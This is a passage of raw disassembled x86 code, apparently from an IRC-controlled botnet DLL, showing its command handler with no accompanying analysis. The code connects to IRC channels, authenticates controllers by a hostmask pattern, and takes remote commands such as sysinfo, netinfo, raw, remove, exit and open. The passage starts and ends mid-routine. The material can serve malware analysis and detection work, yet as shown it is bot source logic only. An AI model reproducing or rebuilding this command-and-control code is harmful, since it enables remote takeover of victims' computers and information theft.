add esp, 8
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, s
push ecx ; s
call ds:send ; send
mov esp, ebp
pop ebp
retn
sub_10007293 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10007303(int,char *Format,char)
sub_10007303 proc near ; CODE XREF: sub_100024A5+362�p
; sub_100024A5+7C4�p ...
ArgList = dword ptr -404h
buf = byte ptr -400h
DstBuf = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 404h
lea eax, [ebp+arg_8]
mov [ebp+ArgList], eax
mov ecx, [ebp+ArgList]
push ecx ; ArgList
mov edx, [ebp+Format]
push edx ; Format
push 200h ; MaxCount
lea eax, [ebp+DstBuf]
push eax ; DstBuf
call ds:_vsnprintf ; _vsnprintf
add esp, 10h
lea ecx, [ebp+DstBuf]
push ecx
mov edx, [ebp+arg_0]
push edx
push offset aPrivmsgSS ; "PRIVMSG %s :%s"
push 1FEh ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push offset asc_10012180 ; "\r\n"
lea ecx, [ebp+buf]
push ecx ; Dest
call strcat ; strcat
add esp, 8
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, s
push ecx ; s
call ds:send ; send
mov esp, ebp
pop ebp
retn
sub_10007303 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10007398 proc near ; CODE XREF: sub_10007424+36B�p
; sub_10007424+462�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 20h ; Count
push 21h
push 1
mov eax, [ebp+arg_0]
push eax
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_10012B10 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 10h ; Count
push 40h
push 1
mov ecx, [ebp+arg_0]
push ecx
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_10012B30 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 10h ; Count
push 21h
push 2
mov edx, [ebp+arg_0]
push edx
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_10012B30 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 80h ; Count
push 40h
push 2
mov eax, [ebp+arg_0]
push eax
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_10012B40 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
pop ebp
retn
sub_10007398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10007424(char *Str)
sub_10007424 proc near ; CODE XREF: start+35B�p
; sub_10007424+551�p ...
var_2B58 = dword ptr -2B58h
var_2B54 = dword ptr -2B54h
var_2B50 = dword ptr -2B50h
var_2B4C = dword ptr -2B4Ch
var_2B48 = byte ptr -2B48h
var_2B47 = dword ptr -2B47h
var_2B43 = dword ptr -2B43h
var_2B3F = dword ptr -2B3Fh
var_2B3B = word ptr -2B3Bh
var_2B39 = byte ptr -2B39h
TempFileName = byte ptr -2B38h
var_2B37 = byte ptr -2B37h
NumberOfBytesRead= dword ptr -2A34h
hFile = dword ptr -2A30h
PathName = byte ptr -2A2Ch
var_2A2B = byte ptr -2A2Bh
var_2928 = byte ptr -2928h
var_2927 = byte ptr -2927h
uCode = dword ptr -2728h
String = byte ptr -2724h
var_2620 = dword ptr -2620h
var_261C = byte ptr -261Ch
var_2618 = dword ptr -2618h
var_2614 = dword ptr -2614h
var_2610 = byte ptr -2610h
var_260C = dword ptr -260Ch
var_2608 = dword ptr -2608h
var_2604 = dword ptr -2604h
var_2600 = word ptr -2600h
var_25FE = byte ptr -25FEh
var_25BE = dword ptr -25BEh
var_25AD = dword ptr -25ADh
var_25A4 = dword ptr -25A4h
VersionInformation= _OSVERSIONINFOA ptr -25A0h
var_250C = dword ptr -250Ch
var_2508 = dword ptr -2508h
lpBuffer = dword ptr -2504h
nSize = dword ptr -2500h
LCData = byte ptr -24FCh
var_24F0 = dword ptr -24F0h
var_24EC = dword ptr -24ECh
var_24E4 = word ptr -24E4h
Drive = byte ptr -22E2h
var_21E1 = dword ptr -21E1h
FullPath = byte ptr -21DCh
var_20DC = byte ptr -20DCh
Buffer = byte ptr -20D0h
var_1FD0 = dword ptr -1FD0h
var_1FCC = dword ptr -1FCCh
var_1ECC = byte ptr -1ECCh
var_1DCC = dword ptr -1DCCh
var_1DC8 = dword ptr -1DC8h
var_1DC4 = dword ptr -1DC4h
var_1DC0 = word ptr -1DC0h
var_1DBE = dword ptr -1DBEh
var_1D3E = byte ptr -1D3Eh
var_1D3D = dword ptr -1D3Dh
var_1D38 = dword ptr -1D38h
var_1D34 = dword ptr -1D34h
var_1D30 = word ptr -1D30h
var_1D2E = dword ptr -1D2Eh
var_1CAE = byte ptr -1CAEh
var_1CAD = dword ptr -1CADh
Parameter = dword ptr -1CA8h
var_1CA4 = dword ptr -1CA4h
var_1CA0 = dword ptr -1CA0h
var_1C20 = byte ptr -1C20h
var_1C1F = dword ptr -1C1Fh
var_1C18 = dword ptr -1C18h
var_1C14 = dword ptr -1C14h
var_1B14 = byte ptr -1B14h
var_1A13 = byte ptr -1A13h
var_1A12 = byte ptr -1A12h
var_1A11 = dword ptr -1A11h
var_1A0C = dword ptr -1A0Ch
var_1A08 = dword ptr -1A08h
var_1908 = byte ptr -1908h
var_18F8 = dword ptr -18F8h
var_18F4 = byte ptr -18F4h
FileName = byte ptr -17F4h
var_16F4 = byte ptr -16F4h
var_15F4 = byte ptr -15F4h
Parameters = byte ptr -14F4h
var_13F4 = byte ptr -13F4h
File = byte ptr -12F4h
SubStr = byte ptr -11F4h
var_10F4 = byte ptr -10F4h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = byte ptr -0FECh
var_FE8 = dword ptr -0FE8h
var_FE4 = byte ptr -0FE4h
var_DE4 = byte ptr -0DE4h
var_BE4 = byte ptr -0BE4h
var_9E4 = byte ptr -9E4h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_5DC = byte ptr -5DCh
var_3DC = byte ptr -3DCh
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
in = in_addr ptr -1D0h
var_1CC = dword ptr -1CCh
Dest = byte ptr -1C8h
var_188 = byte ptr -188h
var_127 = dword ptr -127h
var_122 = byte ptr -122h
var_11F = byte ptr -11Fh
var_116 = byte ptr -116h
var_110 = byte ptr -110h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
Dst = dword ptr -80h
Str2 = dword ptr -7Ch
Source = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
Str = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2B58h
call __alloca_probe
push edi
push 80h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 100h ; Size
push 0 ; Val
lea ecx, [ebp+var_188]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 20h
mov edx, [ebp+Str]
push edx
call sub_10004581
add esp, 8
mov [ebp+var_84], eax
cmp [ebp+var_84], 20h
jle short loc_10007482
mov [ebp+var_84], 20h
loc_10007482: ; CODE XREF: sub_10007424+52�j
mov [ebp+var_88], 0
jmp short loc_1000749D
; ---------------------------------------------------------------------------
loc_1000748E: ; CODE XREF: sub_10007424+A9�j
mov eax, [ebp+var_88]
add eax, 1
mov [ebp+var_88], eax
loc_1000749D: ; CODE XREF: sub_10007424+68�j
mov ecx, [ebp+var_88]
cmp ecx, [ebp+var_84]
jge short loc_100074CF
push 20h
mov edx, [ebp+var_88]
add edx, 1
push edx
mov eax, [ebp+Str]
push eax
call sub_10004799
add esp, 0Ch
mov ecx, [ebp+var_88]
mov [ebp+ecx*4+Dst], eax
jmp short loc_1000748E
; ---------------------------------------------------------------------------
loc_100074CF: ; CODE XREF: sub_10007424+85�j
mov edx, [ebp+var_84]
sub edx, 1
mov [ebp+var_88], edx
jmp short loc_100074EF
; ---------------------------------------------------------------------------
loc_100074E0: ; CODE XREF: sub_10007424:loc_10007540�j
mov eax, [ebp+var_88]
sub eax, 1
mov [ebp+var_88], eax
loc_100074EF: ; CODE XREF: sub_10007424+BA�j
cmp [ebp+var_88], 1
jl short loc_10007542
mov ecx, [ebp+var_88]
mov edx, [ebp+ecx*4+Dst]
movsx eax, byte ptr [edx]
cmp eax, 2Dh
jnz short loc_10007540
mov ecx, [ebp+var_88]
mov edx, [ebp+ecx*4+Dst]
movsx eax, byte ptr [edx+2]
test eax, eax
jnz short loc_10007540
mov ecx, [ebp+var_88]
mov edx, [ebp+ecx*4+Dst]
movsx eax, byte ptr [edx+1]
mov [ebp+eax+var_188], 1
mov ecx, [ebp+var_88]
mov [ebp+ecx*4+Dst], 0
loc_10007540: ; CODE XREF: sub_10007424+E4�j
; sub_10007424+F6�j
jmp short loc_100074E0
; ---------------------------------------------------------------------------
loc_10007542: ; CODE XREF: sub_10007424+D2�j
cmp [ebp+Dst], 0
jnz short loc_1000754D
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000754D: ; CODE XREF: sub_10007424+122�j
mov edx, [ebp+Dst]
push edx ; Str2
push offset aPing ; "PING"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007574
mov eax, [ebp+Str2]
push eax ; char
push offset aPongS ; "PONG %s"
call sub_10007293
add esp, 8
loc_10007574: ; CODE XREF: sub_10007424+13D�j
cmp [ebp+Str2], 0
jnz short loc_1000757F
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000757F: ; CODE XREF: sub_10007424+154�j
mov ecx, [ebp+Dst]
add ecx, 1
mov [ebp+Dst], ecx
mov edx, [ebp+Str2]
push edx ; Str2
push offset a001 ; "001"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100075E0
push 20h ; Count
mov eax, [ebp+Source]
push eax ; Source
push offset byte_10012AF0 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push offset byte_10012AF0 ; char
push offset aUserhostS ; "USERHOST %s"
call sub_10007293
add esp, 8
push offset dword_1002C768
push offset byte_1002C868 ; char
push offset aJoinSS ; "JOIN %s %s"
call sub_10007293
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100075E0: ; CODE XREF: sub_10007424+178�j
mov ecx, [ebp+Str2]
push ecx ; Str2
push offset a302 ; "302"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_1000773E
mov edx, [ebp+var_74]
add edx, 1
mov [ebp+var_74], edx
push 3Dh
push 1
mov eax, [ebp+var_74]
push eax
call sub_10004799
add esp, 0Ch
push eax ; Str2
push offset byte_10012AF0 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10007739
push 40h
push 2
mov ecx, [ebp+var_74]
push ecx
call sub_10004799
add esp, 0Ch
push eax ; Src
call sub_10004BF7
add esp, 4
and eax, 0FFh
test eax, eax
jz loc_100076D6
push 10h ; Count
push 40h
push 2
mov edx, [ebp+var_74]
push edx
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_1002C5D8 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push offset byte_1002C5D8 ; cp
call ds:inet_addr ; inet_addr
push eax ; addr
call sub_1000495F
add esp, 4
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_10007699
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007699: ; CODE XREF: sub_10007424+26E�j
cmp [ebp+var_1CC], 0
jz short loc_100076B0
mov eax, [ebp+var_1CC]
mov [ebp+var_2B4C], eax
jmp short loc_100076BA
; ---------------------------------------------------------------------------
loc_100076B0: ; CODE XREF: sub_10007424+27C�j
mov [ebp+var_2B4C], offset byte_1002C5D8
loc_100076BA: ; CODE XREF: sub_10007424+28A�j
push 80h ; Count
mov ecx, [ebp+var_2B4C]
push ecx ; Source
push offset byte_10012A70 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp short loc_10007739
; ---------------------------------------------------------------------------
loc_100076D6: ; CODE XREF: sub_10007424+226�j
push 80h ; Count
push 40h
push 2
mov edx, [ebp+var_74]
push edx
call sub_10004799
add esp, 0Ch
push eax ; Source
push offset byte_10012A70 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push offset byte_10012A70 ; name
call sub_10004763
add esp, 4
mov dword ptr [ebp+in.S_un], eax
cmp dword ptr [ebp+in.S_un], 0
jnz short loc_1000771B
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000771B: ; CODE XREF: sub_10007424+2F0�j
push 10h ; Count
mov eax, dword ptr [ebp+in.S_un]
push eax ; in
call ds:inet_ntoa ; inet_ntoa
push eax ; Source
push offset byte_1002C5D8 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_10007739: ; CODE XREF: sub_10007424+200�j
; sub_10007424+2B0�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000773E: ; CODE XREF: sub_10007424+1D0�j
mov ecx, [ebp+Str2]
push ecx ; Str2
push offset a433 ; "433"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_1000776C
call sub_10006FA2
push eax ; char
push offset aNickS ; "NICK %s"
call sub_10007293
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000776C: ; CODE XREF: sub_10007424+32E�j
mov edx, [ebp+Str2]
push edx ; Str2
push offset aNick ; "NICK"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100077C7
mov eax, [ebp+Source]
add eax, 1
mov [ebp+Source], eax
mov ecx, [ebp+Dst]
push ecx
call sub_10007398
add esp, 4
push offset byte_10012B10 ; Str2
push offset byte_10012AF0 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100077C2
push 20h ; Count
mov edx, [ebp+Source]
push edx ; Source
push offset byte_10012AF0 ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100077C2: ; CODE XREF: sub_10007424+388�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100077C7: ; CODE XREF: sub_10007424+35C�j
mov eax, [ebp+Str2]
push eax ; Str2
push offset aKick ; "KICK"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007824
mov ecx, [ebp+var_74]
push ecx ; Str2
push offset byte_10012AF0 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_1000781F
mov edx, [ebp+Source]
push edx ; Str2
push offset byte_1002C868 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_1000781F
push offset dword_1002C768
mov eax, [ebp+Source]
push eax ; char
push offset aJoinSS_0 ; "JOIN %s %s"
call sub_10007293
add esp, 0Ch
loc_1000781F: ; CODE XREF: sub_10007424+3CD�j
; sub_10007424+3E3�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007824: ; CODE XREF: sub_10007424+3B7�j
mov ecx, [ebp+Str2]
push ecx ; Str2
push offset aPrivmsg ; "PRIVMSG"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jz short loc_10007854
mov edx, [ebp+Str2]
push edx ; Str2
push offset a332 ; "332"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_1000982A
loc_10007854: ; CODE XREF: sub_10007424+414�j
mov eax, [ebp+Str2]
push eax ; Str2
push offset aPrivmsg_0 ; "PRIVMSG"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100079FA
mov ecx, [ebp+var_74]
add ecx, 1
mov [ebp+var_74], ecx
cmp [ebp+var_74], 0
jnz short loc_10007882
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007882: ; CODE XREF: sub_10007424+457�j
mov edx, [ebp+Dst]
push edx
call sub_10007398
add esp, 4
mov eax, [ebp+Source]
push eax ; Str2
push offset byte_10012AF0 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100078BD
push 40h ; Count
push offset byte_10012B10 ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp short loc_100078D3
; ---------------------------------------------------------------------------
loc_100078BD: ; CODE XREF: sub_10007424+47E�j
push 40h ; Count
mov edx, [ebp+Source]
push edx ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100078D3: ; CODE XREF: sub_10007424+497�j
mov ecx, [ebp+var_74]
push ecx ; Str2
push offset byte_10012AF0 ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100078F5
mov [ebp+var_1D4], 4
jmp short loc_100078FF
; ---------------------------------------------------------------------------
loc_100078F5: ; CODE XREF: sub_10007424+4C3�j
mov [ebp+var_1D4], 3
loc_100078FF: ; CODE XREF: sub_10007424+4CF�j
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Dst], 0
jnz short loc_10007911
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007911: ; CODE XREF: sub_10007424+4E6�j
push 3Bh
mov eax, [ebp+Str]
push eax
call sub_10004581
add esp, 8
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 2
jl loc_100079F5
push 200h ; Count
mov ecx, [ebp+Dst]
push ecx ; Source
lea edx, [ebp+var_5DC]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 200h ; Count
mov eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+var_3DC]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 3Bh
push 1
mov edx, [ebp+Str]
push edx
call sub_10004799
add esp, 0Ch
push eax ; Str
call sub_10007424
add esp, 4
mov [ebp+var_1DC], 2
jmp short loc_10007998
; ---------------------------------------------------------------------------
loc_10007989: ; CODE XREF: sub_10007424+5CF�j
mov eax, [ebp+var_1DC]
add eax, 1
mov [ebp+var_1DC], eax
loc_10007998: ; CODE XREF: sub_10007424+563�j
mov ecx, [ebp+var_1DC]
cmp ecx, [ebp+var_1D8]
jg short loc_100079F5
push 3Bh
mov edx, [ebp+var_1DC]
push edx
mov eax, [ebp+Str]
push eax
call sub_10004799
add esp, 0Ch
push eax
lea ecx, [ebp+var_3DC]
push ecx
lea edx, [ebp+var_5DC]
push edx
push offset aSPrivmsgSS ; ":%s PRIVMSG %s :%s"
push 200h ; Count
lea eax, [ebp+var_7DC]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
lea ecx, [ebp+var_7DC]
push ecx ; Str
call sub_10007424
add esp, 4
jmp short loc_10007989
; ---------------------------------------------------------------------------
loc_100079F5: ; CODE XREF: sub_10007424+508�j
; sub_10007424+580�j
jmp loc_10007B4C
; ---------------------------------------------------------------------------
loc_100079FA: ; CODE XREF: sub_10007424+444�j
mov edx, [ebp+Str2]
push edx ; Str2
push offset a332_0 ; "332"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10007B4C
mov eax, [ebp+var_70]
add eax, 1
mov [ebp+var_70], eax
cmp [ebp+var_70], 0
jnz short loc_10007A28
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007A28: ; CODE XREF: sub_10007424+5FD�j
push 40h ; Count
mov ecx, [ebp+var_74]
push ecx ; Source
lea edx, [ebp+Dest]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov [ebp+var_1D4], 4
push 3Bh
mov eax, [ebp+Str]
push eax
call sub_10004581
add esp, 8
mov [ebp+var_7E0], eax
cmp [ebp+var_7E0], 2
jl loc_10007B4C
push 200h ; Count
mov ecx, [ebp+Dst]
push ecx ; Source
lea edx, [ebp+var_DE4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 200h ; Count
mov eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+var_BE4]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 200h ; Count
mov edx, [ebp+var_74]
push edx ; Source
lea eax, [ebp+var_9E4]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 3Bh
push 1
mov ecx, [ebp+Str]
push ecx
call sub_10004799
add esp, 0Ch
push eax ; Str
call sub_10007424
add esp, 4
mov [ebp+var_7E4], 2
jmp short loc_10007AE8
; ---------------------------------------------------------------------------
loc_10007AD9: ; CODE XREF: sub_10007424+726�j
mov edx, [ebp+var_7E4]
add edx, 1
mov [ebp+var_7E4], edx
loc_10007AE8: ; CODE XREF: sub_10007424+6B3�j
mov eax, [ebp+var_7E4]
cmp eax, [ebp+var_7E0]
jg short loc_10007B4C
push 3Bh
mov ecx, [ebp+var_7E4]
push ecx
mov edx, [ebp+Str]
push edx
call sub_10004799
add esp, 0Ch
push eax
lea eax, [ebp+var_9E4]
push eax
lea ecx, [ebp+var_BE4]
push ecx
lea edx, [ebp+var_DE4]
push edx
push offset aS332SSS ; ":%s 332 %s %s :%s"
push 200h ; Count
lea eax, [ebp+var_FE4]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
lea ecx, [ebp+var_FE4]
push ecx ; Str
call sub_10007424
add esp, 4
jmp short loc_10007AD9
; ---------------------------------------------------------------------------
loc_10007B4C: ; CODE XREF: sub_10007424:loc_100079F5�j
; sub_10007424+5EA�j ...
push 21h
push 2
mov edx, [ebp+Dst]
push edx
call sub_10004799
add esp, 0Ch
push eax
push offset a@fbi_gov ; "*@fbi.gov"
call sub_1000ACB2
add esp, 8
test eax, eax
jnz short loc_10007B89
mov eax, [ebp+Str2]
push eax ; Str2
push offset a332_1 ; "332"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jz short loc_10007B89
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007B89: ; CODE XREF: sub_10007424+748�j
; sub_10007424+75E�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aBotid ; "botid"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007BC4
push offset Name ; char
push offset aBotidS___ ; "{BOTID}: %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007BC4: ; CODE XREF: sub_10007424+780�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aUptime ; "uptime"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10007CB1
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_FE8], eax
mov eax, [ebp+var_FE8]
xor edx, edx
mov ecx, 15180h
div ecx
mov dword ptr [ebp+var_FEC], eax
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Str2], 0
jz short loc_10007C38
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Str
call ds:atol ; atol
add esp, 4
cmp dword ptr [ebp+var_FEC], eax
jb short loc_10007CAC
loc_10007C38: ; CODE XREF: sub_10007424+7F6�j
mov eax, [ebp+var_FE8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_FF0], eax
mov eax, [ebp+var_FE8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 3Ch
div ecx
mov [ebp+var_FF4], eax
mov edx, [ebp+var_FF4]
push edx
mov eax, [ebp+var_FF0]
push eax
mov ecx, dword ptr [ebp+var_FEC]
push ecx ; char
push offset aUptimeLudLuhLu ; "{UPTIME}: %lud %luh %lum..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 14h
loc_10007CAC: ; CODE XREF: sub_10007424+812�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007CB1: ; CODE XREF: sub_10007424+7BB�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aSysinfo ; "sysinfo"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007CED
call sub_10004987
push eax ; char
push offset aSysinfoS___ ; "{SYSINFO}: %s..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007CED: ; CODE XREF: sub_10007424+8A8�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aNetinfo ; "netinfo"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007D29
call sub_10004BB5
push eax ; char
push offset aNetinfoS___ ; "{NETINFO}: %s..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007D29: ; CODE XREF: sub_10007424+8E4�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aReconnect ; "reconnect"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007D58
push offset aQuit_1 ; "QUIT"
call sub_10007293
add esp, 4
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007D58: ; CODE XREF: sub_10007424+920�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aExit ; "exit"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007D8F
call sub_1000AAE1
push offset aQuit_2 ; "QUIT"
call sub_10007293
add esp, 4
push 0 ; Code
call ds:exit ; exit
; ---------------------------------------------------------------------------
loc_10007D8F: ; CODE XREF: sub_10007424+94F�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aRemove ; "remove"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10007DF6
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jz short loc_10007DDA
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Str2
push offset Name ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10007DDA
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007DDA: ; CODE XREF: sub_10007424+993�j
; sub_10007424+9AF�j
call sub_1000AAE1
push offset aQuit_3 ; "QUIT"
call sub_10007293
add esp, 4
call sub_10004EA7
; ---------------------------------------------------------------------------
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007DF6: ; CODE XREF: sub_10007424+986�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aRaw ; "raw"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10007EDE
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Str2], 0
jnz short loc_10007E29
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007E29: ; CODE XREF: sub_10007424+9FE�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx
push offset aS_1 ; " %s"
push 100h ; Count
lea edx, [ebp+SubStr]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 100h ; Count
lea eax, [ebp+SubStr]
push eax ; SubStr
mov ecx, [ebp+Str]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea edx, [ebp+var_10F4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Source
lea edx, [ebp+SubStr]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
lea eax, [ebp+SubStr]
push eax ; SubStr
lea ecx, [ebp+var_10F4]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea edx, [ebp+var_10F4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea eax, [ebp+var_10F4]
push eax ; char
push offset aRawS___ ; "{RAW}: %s..."
call sub_10007293
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007EDE: ; CODE XREF: sub_10007424+9ED�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aOpen_5 ; "open"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10007FE7
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jnz short loc_10007F11
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007F11: ; CODE XREF: sub_10007424+AE6�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx
push offset aS_2 ; " %s"
push 100h ; Count
lea eax, [ebp+var_13F4]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 100h ; Count
lea ecx, [ebp+var_13F4]
push ecx ; SubStr
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea eax, [ebp+File]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
